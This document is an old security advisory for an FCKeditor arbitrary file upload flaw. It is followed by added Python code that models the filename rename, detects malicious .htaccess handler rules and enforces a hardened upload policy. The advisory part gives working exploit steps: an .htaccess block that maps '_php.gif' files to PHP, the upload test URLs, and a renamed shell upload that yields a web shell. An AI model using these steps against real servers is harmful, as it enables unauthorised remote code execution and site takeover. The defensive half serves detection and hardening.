FCKeditor Upload vulnerability in all PHP versions
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all version Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor:
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available from the server.
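The server-side behaviours this advisory relies on, modelled in Python as an added example (not code from the advisory, from this site, or from FCKeditor): the dot-to-underscore rename as the page describes it, a check that flags an uploaded .htaccess whose FilesMatch/SetHandler block would route a given filename to PHP, and an upload policy that refuses dotfiles and executable-extension tokens so the renamed name is rejected as well. The extension lists are assumptions to be adjusted per deployment.

```python
import re

# Assumed lists for this example: extend them to match the deployment.
EXECUTABLE_TOKENS = {"php", "php3", "php4", "php5", "phtml", "phar"}
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}


def fckeditor_style_rename(filename: str) -> str:
    """Model of the renaming the advisory describes: every dot except the
    last becomes an underscore, so "shell.php.gif" turns into "shell_php.gif".
    Reconstructed from the page's description, not FCKeditor's own code."""
    stem, sep, ext = filename.rpartition(".")
    if not sep:
        return filename
    return stem.replace(".", "_") + "." + ext


def htaccess_routes_to_php(htaccess_text: str, filename: str) -> bool:
    """Detection helper for an upload directory: True when a <FilesMatch ...>
    block in the .htaccess text sets the PHP handler for a regex that
    matches `filename`. Only the FilesMatch/SetHandler form shown in the
    advisory is parsed."""
    block = re.compile(r'<FilesMatch\s+"?([^"\s>]+)"?\s*>(.*?)</FilesMatch>', re.S | re.I)
    for regex, body in block.findall(htaccess_text):
        if (re.search(r"SetHandler\s+application/x-httpd-php", body, re.I)
                and re.search(regex, filename)):
            return True
    return False


def is_safe_upload(filename: str) -> bool:
    """Hardened upload policy: no dotfiles (so .htaccess itself is refused),
    an allow-listed final extension, and no executable-extension token
    anywhere in the name, because the rename above still leaves
    "shell_php.gif" matching the "_php.gif" pattern."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not name or name.startswith("."):
        return False
    _, sep, ext = name.rpartition(".")
    if not sep or ext.lower() not in ALLOWED_EXTENSIONS:
        return False
    tokens = re.split(r"[._]", name.lower())
    return not any(tok in EXECUTABLE_TOKENS for tok in tokens)


# Constructed sample .htaccess mirroring the block in the advisory.
SAMPLE_HTACCESS = '<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'
```

Running `htaccess_routes_to_php` over any .htaccess found under an upload root is a cheap post-incident check; `is_safe_upload` is the policy to apply before the file is written.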